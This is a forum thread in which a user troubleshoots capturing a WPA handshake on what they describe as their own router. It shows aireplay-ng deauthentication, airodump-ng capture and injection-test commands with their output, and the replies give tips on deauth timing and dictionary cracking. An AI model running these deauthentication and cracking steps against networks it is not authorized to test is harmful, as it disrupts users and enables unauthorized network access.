Jump to content

WPA Handshake not working

gavshouse

By gavshouse
in Security

 Share

Recommended Posts

gavshouse Newbie

gavshouse

Posted
Posted

ok hi ive watch the show season 5 ep 18 i think where they show how to hack WPA also ive watched many youtube videos im typing in all the right commands but its not working correctly

first of little info

Router ESSID:staniforth

Wifi Interface:wifi0

BSSID:00:17:3F:53:37:BE

Client Mac: 00:17:3F:71:EA:F5

i have 1 computer connected i obv know the password so im trying to disconnect which works then get the handshake

sudo airodump-ng -c 3 -b 00:17:3F:53:37:BE -w staniforth_a wifi0

sudo aireplay-ng -0 30 -a 00:17:3F:53:37:BE -c 00:17:3F:71:EA:F5 wifi0

it all works my other computer reconnects but nothing happens

gav@gav-laptop:~$ sudo airmon-ng start wifi0
[sudo] password for gav: 


Interface    Chipset        Driver

wifi0        Centrino a/b/g    ipwraw-ng (monitor mode enabled)
wlan1        Ralink 2573 USB    rt73usb - [phy2]

13:26:27  Sending DeAuth to station   -- STMAC: [00:17:3F:71:EA:F5]
13:26:27  Sending DeAuth to station   -- STMAC: [00:17:3F:71:EA:F5]
13:26:28  Sending DeAuth to station   -- STMAC: [00:17:3F:71:EA:F5]
13:26:28  Sending DeAuth to station   -- STMAC: [00:17:3F:71:EA:F5]

 3 ][ Elapsed: 37 s ][ 2009-09-02 13:27 
                                                                                                         
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                         
 00:17:3F:53:37:BE   -1 100      362      106    0   3  48  WPA  TKIP   PSK  staniforth                 
                                                                                                         
 BSSID              STATION            PWR  Lost  Packets  Probes                                        
                                                                                                         
 00:17:3F:53:37:BE  00:17:3F:71:EA:F5   -1     0      106

any thoughts ?

Link to comment
Share on other sites
digip Newbie

digip

Posted
Posted

Are you sending it to a Belkin Router or the users mac address of their nic? Looks like it might be the router. If I remember correctly you need to send the deauth to the users mac, not the router. Try sending the deauth to "00:17:3F:53:37:BE" instead of "00:17:3F:71:EA:F5".

Link to comment
Share on other sites
gavshouse Newbie

gavshouse

Posted
  • Author
Posted
Are you sending it to a Belkin Router or the users mac address of their nic? Looks like it might be the router. If I remember correctly you need to send the deauth to the users mac, not the router. Try sending the deauth to "00:17:3F:53:37:BE" instead of "00:17:3F:71:EA:F5".

i think to the mac

ive tried

sudo aireplay-ng -0 50 -a 00:17:3F:71:EA:F5 -c 00:17:3F:53:37:BE wifi0

and

sudo aireplay-ng -0 50 -a 00:17:3F:53:37:BE -c 00:17:3F:71:EA:F5 wifi0

both disconnect the pc and it reconnects but it doesnt popup saying its got the handshake

Link to comment
Share on other sites
digip Newbie

digip

Posted
Posted

I would send 4 at a time, then 4 more, then 4 more, space them out, 50 is just overkill. Run the command severl times with a second or two between tries, but so long as your card is in monitor mode and capturing on the correct channel you should have the handshake in the pcap after a few deauths and reconnects.

Maybe you are missing a step or your card isn't properly doing monitor mode, too far away, etc, could be a number of reasons.

Check this video, might help you out a bit more:

Link to comment
Share on other sites
gavshouse Newbie

gavshouse

Posted
  • Author
Posted
I would send 4 at a time, then 4 more, then 4 more, space them out, 50 is just overkill. Run the command severl times with a second or two between tries, but so long as your card is in monitor mode and capturing on the correct channel you should have the handshake in the pcap after a few deauths and reconnects.

Maybe you are missing a step or your card isn't properly doing monitor mode, too far away, etc, could be a number of reasons.

Check this video, might help you out a bit more:

Yeah ok im 100% sure its work i have got a handshake in my .cap and it found my keys, my commands are correct ive also ran a injection test

gav@gav-laptop:~/Desktop/hack$ sudo aireplay-ng --test wifi0
01:11:59  Trying broadcast probe requests...
01:11:59  Injection is working!
01:12:00  Found 1 AP 

01:12:00  Trying directed probe requests...
01:12:00  00:17:3F:53:37:BE - channel: 3 - 'Belkin54g'
01:12:03  Ping (min/avg/max): 2.038ms/17.191ms/33.515ms
01:12:03  21/30: 70%

gav@gav-laptop:~/Desktop/hack$

so the question is why is it getting the handshake but not reporting it back ?

Link to comment
Share on other sites
miT Newbie

miT

Posted
Posted

I had this issue when i was testing my WPA with my password in a text file along with some common dictionary words. My password was at the very end of the file so it should of been successful in the end. I couldn't figure it out and moved on.

After I grabbed aircrack-ng from the svn, it worked like a charm. I would suggest getting the latest and greatest and trying again.

Link to comment
Share on other sites
gavshouse Newbie

gavshouse

Posted
  • Author
Posted
I had this issue when i was testing my WPA with my password in a text file along with some common dictionary words. My password was at the very end of the file so it should of been successful in the end. I couldn't figure it out and moved on.

After I grabbed aircrack-ng from the svn, it worked like a charm. I would suggest getting the latest and greatest and trying again.

think you mistaken what im asking, i have decrypted a key "wikipedia" which i simply wrote in so that means it had the handshake but airodump-ng didnt report back saying it had the handshake in the first place, sorry if im not clear

Link to comment
Share on other sites
digip Newbie

digip

Posted
Posted

Maybe download the latest version anyway, like suggested, and see what happens.

Link to comment
Share on other sites
miT Newbie

miT

Posted
Posted
think you mistaken what im asking, i have decrypted a key "wikipedia" which i simply wrote in so that means it had the handshake but airodump-ng didnt report back saying it had the handshake in the first place, sorry if im not clear

You don't catch the hand shake via typing it in on the client. You send deauths to the router masquerading as the client then catch the handshake. I'm sure it will work either way, but that's the way i've always done it.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...